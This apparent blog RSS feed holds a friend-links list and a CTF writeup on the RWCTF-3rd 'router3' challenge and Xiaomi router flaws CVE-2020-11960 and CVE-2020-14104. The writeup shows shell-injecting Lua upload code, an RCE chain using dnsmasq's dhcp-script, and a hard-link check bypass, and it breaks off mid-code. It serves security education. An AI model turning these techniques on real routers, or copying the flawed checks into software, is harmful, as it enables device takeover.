https://bash-c.github.io/ Recent content on localhost - Done with development, it's time to pwn. Hugo -- gohugo.io en M4x Sat, 06 Feb 2021 17:40:46 +0800 https://bash-c.github.io/link/ Mon, 01 Jan 0001 00:00:00 +0000 https://bash-c.github.io/link/ <blockquote> <p>新添加了友链功能, 有需要的小伙伴可以联系我</p> </blockquote> <ul> <li><a href="https://ctf-wiki.github.io/ctf-wiki/">ctf-wiki</a></li> </ul> <h2 id="各种途径认识的师傅">各种途径认识的师傅</h2> <blockquote> <p>多谢师傅们照顾</p> </blockquote> <ul> <li> <p><a href="http://myhackerworld.top">D4rk3r</a></p> </li> <li> <p><a href="http://p4nda.top">P4nda</a></p> </li> <li> <p><a href="https://blog.csdn.net/niexinming">Uriel</a></p> </li> <li> <p><a href="https://bestwing.me/">Swings</a></p> </li> <li> <p><a href="https://tac1t0rnx.space/">Tac1t0rnX</a></p> </li> </ul> <h2 id="我校学弟和学妹">我校学弟（和学妹）</h2> <blockquote> <p>苟富贵莫相忘</p> </blockquote> <ul> <li> <p><a href="https://www.aloxaf.com">Aloxaf</a></p> </li> <li> <p><a href="https://code.felinae98.cn">feilinae98</a></p> </li> <li> <p><a href="https://l1b0.github.io">L1B0</a></p> </li> <li> <p><a href="https://www.cnblogs.com/ZHijack/">Pn</a></p> </li> <li> <p><a href="https://vang3lis.github.io">vang3lis</a></p> </li> </ul> https://bash-c.github.io/post/rwctf-3rd_router3__cve-2020-14104-writeup/ Sat, 06 Feb 2021 17:40:46 +0800 https://bash-c.github.io/post/rwctf-3rd_router3__cve-2020-14104-writeup/ <h1 id="writeup-for-rwctf-3rd-router3-and-real-writeup-for-cve-2020-14104">Writeup for RWCTF-3rd router3 and real writeup for CVE-2020-14104</h1> <p>I made a challenge named <a href="https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments/tree/main/router3">router3</a> for <a href="https://ctftime.org/event/1198">RWCTF-3rd</a>. Team <a href="https://ctftime.org/team/143448">CodeR00t</a> ,<a href="https://blog.bushwhackers.ru/">Bushwhackers</a> and <a href="https://twitter.com/Sauercl0ud">Sauercloud</a> solved it during the game, congratulations to them!</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/coder00t.png" alt=""></p> <blockquote> <p>first blood was taken by <code>CodeR00t</code></p> </blockquote> <p>Here I want to share the writeup for <code>router3</code> and <code>CVE-2020-14104</code>(the related vuln)</p> <h2 id="writeup-for-router3">Writeup for router3</h2> <h3 id="information-of-the-challenge">information of the challenge</h3> <p>In case the readers didn&rsquo;t participate in <code>RWCTF-3rd</code>, I paste the description below:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">router3 Score: 477 web reverse demo Geez, you can access some internal and experimental API using an awesome bug now! Try to exploit the [router](https://rwctf2021.s3-us-west-1.amazonaws.com/router3-a2dcb2d91d0654c87ffce982a86b8794723e76d6.tar.gz) completely next! **root password is not set in the above attachments, but set in the demo environment** </code></pre></td></tr></table> </div> </div><p>And the attachments</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">rwctf@rwctf:~/Desktop$ tar tvf router3.tar.gz -rw-r--r-- root/root <span class="m">268435456</span> 2021-01-08 04:20 openwrt-armvirt-32-root.ext4 -rwxr-xr-x root/root <span class="m">1880792</span> 2021-01-08 03:51 openwrt-armvirt-32-zImage -rw-r--r-- root/root <span class="m">1838</span> 2021-01-09 20:19 readme.md -rwxr-xr-x root/root <span class="m">749</span> 2021-01-08 03:54 start.sh rwctf@rwctf:~/Desktop$ cat start.sh <span class="c1">#!/bin/sh</span> <span class="nv">IMAGE</span><span class="o">=</span>openwrt-armvirt-32-zImage <span class="nv">LAN</span><span class="o">=</span>ledetap0 <span class="nv">DRIVE</span><span class="o">=</span>openwrt-armvirt-32-root.ext4 <span class="c1"># create tap interface which will be connected to OpenWrt LAN NIC</span> ip tuntap add mode tap <span class="nv">$LAN</span> ip link <span class="nb">set</span> dev <span class="nv">$LAN</span> up <span class="c1"># configure interface with static ip to avoid overlapping routes</span> ip addr add 192.168.1.101/24 dev <span class="nv">$LAN</span> qemu-system-arm <span class="se">\ </span><span class="se"></span> -device virtio-net-pci,netdev<span class="o">=</span>lan <span class="se">\ </span><span class="se"></span> -netdev tap,id<span class="o">=</span>lan,ifname<span class="o">=</span><span class="nv">$LAN</span>,script<span class="o">=</span>no,downscript<span class="o">=</span>no <span class="se">\ </span><span class="se"></span> -device virtio-net-pci,netdev<span class="o">=</span>wan <span class="se">\ </span><span class="se"></span> -netdev user,id<span class="o">=</span>wan <span class="se">\ </span><span class="se"></span> -drive <span class="nv">file</span><span class="o">=</span><span class="nv">$DRIVE</span>,format<span class="o">=</span>raw,if<span class="o">=</span>virtio -append <span class="s1">&#39;root=/dev/vda rootwait&#39;</span> <span class="se">\ </span><span class="se"></span> -M virt -nographic -m <span class="m">256</span> -kernel <span class="nv">$IMAGE</span> <span class="c1"># cleanup. delete tap interface created earlier</span> ip addr flush dev <span class="nv">$LAN</span> ip link <span class="nb">set</span> dev <span class="nv">$LAN</span> down ip tuntap del mode tap dev <span class="nv">$LAN</span> rwctf@rwctf:~/Desktop$ file openwrt-armvirt-32-* openwrt-armvirt-32-root.ext4: Linux rev 1.0 ext2 filesystem data <span class="o">(</span>mounted or unclean<span class="o">)</span>, <span class="nv">UUID</span><span class="o">=</span>57f8f4bc-abf4-655f-bf67-946fc0f9f25b <span class="o">(</span>extents<span class="o">)</span> <span class="o">(</span>large files<span class="o">)</span> openwrt-armvirt-32-zImage: ARM OpenFirmware FORTH Dictionary, Text length: -509607936 bytes, Data length: -509607936 bytes, Text Relocation Table length: -369098749 bytes, Data Relocation Table length: <span class="m">24061976</span> bytes, Entry Point: 0x00000000, BSS length: <span class="m">1880792</span> bytes </code></pre></td></tr></table> </div> </div><p>Players are provided with a <code>qemu-launched</code> mips-system based on <a href="http://openwrt.org/">openwrt</a>. According to <code>readme.md</code>(a long document which describes some details for demo-show), the players are asked to achieve <code>RCE</code> or <code>arbitrary-file-write</code>, which could be leveraged to <code>RCE</code> too.</p> <p>Summarize above information:</p> <ul> <li> <p>What kind of challenge it is?</p> <ul> <li>web &amp; reverse</li> </ul> </li> <li> <p>What we have?</p> <ul> <li>a mips-system</li> </ul> </li> <li> <p>What we are supposed to do?</p> <ul> <li>full RCE</li> </ul> </li> </ul> <p>**So where the vuln should be? **</p> <p>Launching this mips-system using <code>start.sh</code>(must be root), from the result of <code>netstat</code> and <code>ps</code>, it&rsquo;s clear that the only process related to <code>web</code> is <code>nginx</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@OpenWrt:/# netstat -antpl netstat: showing only processes with your user ID Active Internet connections <span class="o">(</span>servers and established<span class="o">)</span> Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp <span class="m">0</span> <span class="m">0</span> 0.0.0.0:80 0.0.0.0:* LISTEN 935/nginx.conf -g d ...... root@OpenWrt:/# ps PID USER VSZ STAT COMMAND ...... <span class="m">935</span> root <span class="m">2404</span> S nginx: master process /usr/sbin/nginx -c /etc/nginx/ <span class="m">958</span> root <span class="m">2452</span> S nginx: worker process ...... </code></pre></td></tr></table> </div> </div><p>More specifically, it used <a href="https://openwrt.org/docs/techref/luci">luci</a>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@OpenWrt:~# ls /www/ cgi-bin index.html luci-static root@OpenWrt:~# ls /www/cgi-bin/ cgi-backup cgi-download cgi-exec cgi-upload luci </code></pre></td></tr></table> </div> </div><p>Basically, <strong>luci = <a href="http://www.lua.org/">lua</a> + <a href="https://openwrt.org/docs/techref/uci">uci</a></strong>. In short, luci uses the Lua programming language and is based on some <a href="https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller">MVC</a>-Webframework.</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/MVC.svg" alt=""></p> <p>So users can interact with <code>controller</code>. Let&rsquo;s focus on the <code>controller</code> code, which is located in <code>/usr/lib/lua/luci/controller</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@OpenWrt:~# ls /usr/lib/lua/luci/controller/ -R /usr/lib/lua/luci/controller/: admin api firewall.lua opkg.lua /usr/lib/lua/luci/controller/admin: index.lua network.lua uci.lua /usr/lib/lua/luci/controller/api: index.lua system.lua </code></pre></td></tr></table> </div> </div><p>Compared with standard <code>openwrt</code> system, clearly there is an extra file <code>/usr/lib/lua/luci/controller/api/system.lua</code> here. Probably it is the code that players should focus on.</p> <p>So, let&rsquo;s take a look. But wait! Why it&rsquo;s an ELF file?</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">rwctf@rwctf:~/Desktop$ file system.lua system.lua: ELF 32-bit invalid byte order <span class="o">(</span>SYSV<span class="o">)</span> rwctf@rwctf:~/Desktop$ hexdump -C -n <span class="m">20</span> ./system.lua <span class="m">00000000</span> 7f <span class="m">45</span> 4c <span class="m">46</span> <span class="m">01</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">05</span> <span class="p">|</span>.ELF............<span class="p">|</span> <span class="m">00000010</span> <span class="m">02</span> <span class="m">00</span> <span class="m">03</span> <span class="m">00</span> <span class="p">|</span>....<span class="p">|</span> <span class="m">00000014</span> rwctf@rwctf:~/Desktop$ chmod +x system.lua <span class="p">;</span> ./system.lua Hello world </code></pre></td></tr></table> </div> </div><p>Should we fire up <code>IDA pro</code> or some other decompilers? Of course not, we have known that luci heavily depends on lua. if we have checked <code>lua</code> version in the mips-system, we&rsquo;ll immediately realize that the lua binary is modified so the magic ELF header doesn&rsquo;t mean it&rsquo;s a real ELF file.</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/lua.png" alt=""></p> <p>And that&rsquo;s why there is a tag <code>reverse</code> for the challenge. Players must do some reverse work and write a decompiler before auditing the lua code. I won&rsquo;t show you how to write a decompiler step by step because there have been lots of resources. But I can provide some good references<!-- raw HTML omitted --><a href="https://github.com/feicong/lua_re">1</a> <a href="https://bbs.pediy.com/thread-216969.htm">2</a><!-- raw HTML omitted -->(only in Chinese, sorry) and the <a href="https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments/tree/main/router3/files/310-rwctf-router3.patch">diff file</a>.</p> <p>Next, let&rsquo;s take a break from the challenge and have a glance at <a href="https://privacy.mi.com/trust#/security/vulnerability-management/vulnerability-announcement/detail?id=15&amp;locale=en">CVE-2020-11960</a></p> <h3 id="brief-introduction-to-cve-2020-11960">brief introduction to CVE-2020-11960</h3> <p><code>CVE-2020-11960</code>, which I had presented on <a href="https://hitcon.org/2020/slides/Exploit%20(Almost)%20All%20Xiaomi%20Routers%20Using%20Logical%20Bugs.pdf">HITCON 2020</a>, mainly leveraged files left in <code>/tmp</code> when the uploading procedure failed, to achieve RCE.</p> <p>You can check more details from page 33~55 of the slides and I will briefly introduce how I exploited this vuln here, too.</p> <p>The exploit can be concluded into the following steps:</p> <ol> <li>Due to some trival flaws, we can upload two files <code>/tmp/hack_des.sh</code> &amp; <code>/tmp/dnsmasq.d/mbu.conf</code>, where <code>hack_des.sh</code> is a shell script containing arbitrary command and <code>mbu.conf</code> is a configuration file for <a href="http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html">dnsmasq</a> with assigning <code>/tmp/hack_des.sh</code> as its <code>dhcp-script</code></li> <li>restarting <code>dnsmasq</code> to load <code>mbu.conf</code></li> <li>transfer some file via <code>tftp</code> and then <code>hack_des.sh</code> shall run</li> </ol> <p>The most foremost step is to be able to upload almost arbitrary files to <code>/tmp</code>, upon which we can construct the configuration file of <code>dnsmasq</code> to achieve RCE.</p> <h3 id="writeup-from-players">Writeup from players</h3> <p>Back to the challenge, there are not many interfaces in <code>system.lua</code>. The target should be obvious. I paste the related source code of <code>/api/system/c_upload</code> as follows:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-lua" data-lang="lua"><span class="c1">-- /usr/lib/lua/luci/controller/api/system.lua</span> <span class="n">entry</span><span class="p">({</span><span class="s2">&#34;api&#34;</span><span class="p">,</span> <span class="s2">&#34;system&#34;</span><span class="p">,</span> <span class="s2">&#34;c_upload&#34;</span><span class="p">},</span> <span class="n">call</span><span class="p">(</span><span class="s2">&#34;cUpload&#34;</span><span class="p">),</span> <span class="p">(</span><span class="s2">&#34;&#34;</span><span class="p">),</span> <span class="mi">153</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">a</span> <span class="kr">function</span> <span class="nf">cUpload</span><span class="p">()</span> <span class="p">......</span> <span class="kd">local</span> <span class="n">uploadFilepath</span> <span class="o">=</span> <span class="s2">&#34;/tmp/cfgbackup.tar.gz&#34;</span> <span class="p">......</span> <span class="kd">local</span> <span class="n">ext</span> <span class="o">=</span> <span class="n">XQBackup.extract</span><span class="p">(</span><span class="n">uploadFilepath</span><span class="p">)</span> <span class="p">......</span> <span class="kr">end</span> <span class="c1">-- /usr/lib/lua/xiaoqiang/module/XQBackup.lua</span> <span class="kd">local</span> <span class="n">TMPDIR</span> <span class="o">=</span> <span class="s2">&#34;bkcfg_tmp&#34;</span> <span class="kr">function</span> <span class="nf">extract</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="kd">local</span> <span class="n">fs</span> <span class="o">=</span> <span class="n">require</span><span class="p">(</span><span class="s2">&#34;nixio.fs&#34;</span><span class="p">)</span> <span class="kd">local</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">filepath</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">tarpath</span> <span class="kr">then</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">TARMBUFILE</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">then</span> <span class="kr">return</span> <span class="mi">1</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep ^l &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">b</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep -v .des | grep -v .mbu &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">c</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">22</span> <span class="kr">end</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;cd /tmp; mkdir &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; cd &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; tar -xzf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">d</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.des&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.1</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.mbu&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.2</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">3</span> <span class="kr">end</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;mv /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/* /tmp; rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">f</span> <span class="kr">return</span> <span class="mi">0</span> <span class="kr">end</span> </code></pre></td></tr></table> </div> </div><p>This is a piece of easy-to-understand code snippet, with the following key points:</p> <ul> <li> <p><strong>(a)</strong>. The 4th parameter, <a href="https://github.com/openwrt/luci/wiki/ModulesHowTo#show-me-the-way-the-dispatching-process">order</a>, has a value of <code>9</code>, which means the interface <code>/api/system/c_upload</code> doesn&rsquo;t need authorization, just like the challenge description shows: <code>you can access some internal and experimental API using an awesome bug now!</code></p> </li> <li> <p><strong>(b)</strong>. check if there is a soft(symbolic) link file in the uploaded <code>.tar.gz </code> archive</p> </li> <li> <p><strong>(c)</strong>. check if the files are having their filename ends with <code>.des</code> or <code>.mbu</code></p> </li> <li> <p><strong>(d)</strong>. create a new directory TMPDIR(<code>bkcfg_tmp</code>), and do the extraction step in the new directory</p> </li> <li> <p><strong>(e)</strong>. check if <code>/tmp/bkcfg_tmp/cfg_backup.des</code> &amp; <code>/tmp/bkcfg_tmp/cfg_backup.mbu</code> are released</p> </li> <li> <p><strong>(f)</strong>. move files from <code>/tmp/bkcfg_tmp/</code> to <code>/tmp</code> then remove <code>/tmp/bkcfg_tmp</code></p> </li> </ul> <p>Part <strong>(c)</strong> is copied from <code>CVE-2020-11960</code>. The check here only checks whether the filename contains <code>mbu</code> or <code>des</code>, rather than ends with <code>.mbu</code> or <code>.des</code>. You can also check <a href="https://zhuanlan.zhihu.com/p/245070099">实战逻辑漏洞：三个漏洞搞定一台路由器</a> for the details and again, only in Chinese.</p> <p>Compared with <code>CVE-2020-11960</code>, the extraction is in <code>/tmp/bkcfg_tmp</code>. Files won&rsquo;t be released to <code>/tmp</code>.</p> <p>Let&rsquo;s reflect more on part <strong>(e)</strong> &amp; <strong>(f)</strong>, if we upload an archive, in which there are two files named exactly as <code>cfg_backup.des</code> and <code>cfg_backup.mbu</code>, the <strong>(e)</strong> part check will pass and files will be moved from <code>/tmp/bkcfg_tmp</code> to <code>/tmp</code> at part <strong>(f)</strong>. And then the rest exploitation is as same as <code>CVE-2020-11960</code>. The following image is the exploit file from <code>Bushwhackers</code> .</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/bushwhackers.png" alt=""></p> <p>And <code>Sauercloud</code> used similar method.</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/sauercloud.png" alt=""></p> <p>As you may have known, this is not the intended solution because I made some mistakes. But I still want to praise these teams for they solving this challenge in such a short time!</p> <h3 id="the-unintended-solution-in-the-unintended-solutions">The unintended solution in the unintended solutions</h3> <p>When hosting a CTF game, we&rsquo;re always willing to see unintended solutions, especially which we can learn from.</p> <p>So team <code>CodeR00t</code> totally didn&rsquo;t use the <code>dnsmasq</code> thing. They chose a different way as the following image shows:</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/coder00t_exp.png" alt=""></p> <p>They used <a href="https://en.wikipedia.org/wiki/Hard_link">hard link</a>, which begins with <code>h</code> instead of <code>l</code> in the result of <code>tar -tzvf</code>, to bypass the check of <strong>(b)</strong> to achieve <strong>arbitrary-file-write</strong> in <code>/tmp</code>(not almost-arbitrary, literally arbitrary). Then load the content of <code>iperf_script_pid</code> into shell command via some other interface.</p> <blockquote> <p><code>busybox</code> simplified most commands. From the result of <code>tar -tzvf</code> from <code>busybox</code>, we can&rsquo;t even see hardlink file begins with <code>h</code></p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/hardlink.png" alt=""></p> </blockquote> <p>This trick can also be used for <code>CVE-2020-11960</code>. Good for you, <code>CodeR00t</code>!</p> <h2 id="writeup-for-cve-2020-14104">Writeup for CVE-2020-14104</h2> <p>Next, I will introduce the intended solution, AKA, <code>CVE-2020-14104</code>, and how I made mistakes.</p> <p><code>CVE-2020-14104</code> actually is a partially incomplete fix for <code>CVE-2020-11960</code>, where <strong>partially</strong> means it is not an RCE-able vuln now, but there is some flaw in the checks, which can be used to do other damage like LPE. To make this challenge, I modified the logic of <code>c_upload</code> by simply copying code from both old and new firmware without more thinking about it. More accurately, I copied code of the extraction but not the checks.</p> <p>The following code is the new version code with checks(to make <code>CVE-2020-14104</code> RCE-able, it&rsquo;s not the same as xiaomi&rsquo;s)</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-lua" data-lang="lua"><span class="kd">local</span> <span class="n">TMPDIR</span> <span class="o">=</span> <span class="s2">&#34;bkcfg_tmp&#34;</span> <span class="kr">function</span> <span class="nf">extract</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="kd">local</span> <span class="n">fs</span> <span class="o">=</span> <span class="n">require</span><span class="p">(</span><span class="s2">&#34;nixio.fs&#34;</span><span class="p">)</span> <span class="kd">local</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">filepath</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">tarpath</span> <span class="kr">then</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">TARMBUFILE</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">then</span> <span class="kr">return</span> <span class="mi">1</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep ^l &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">b</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep -v .des | grep -v .mbu &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">c</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">22</span> <span class="kr">end</span> <span class="c1">---------------------------------------------------------- &lt;&lt;--- x</span> <span class="kd">local</span> <span class="n">wcl</span> <span class="o">=</span> <span class="n">io.popen</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | wc -l&#34;</span><span class="p">)</span> <span class="kr">if</span> <span class="n">tonumber</span><span class="p">(</span><span class="n">wcl</span><span class="p">:</span><span class="n">read</span><span class="p">(</span><span class="s2">&#34;*a&#34;</span><span class="p">))</span> <span class="o">~=</span> <span class="mi">2</span> <span class="kr">then</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="n">wcl</span><span 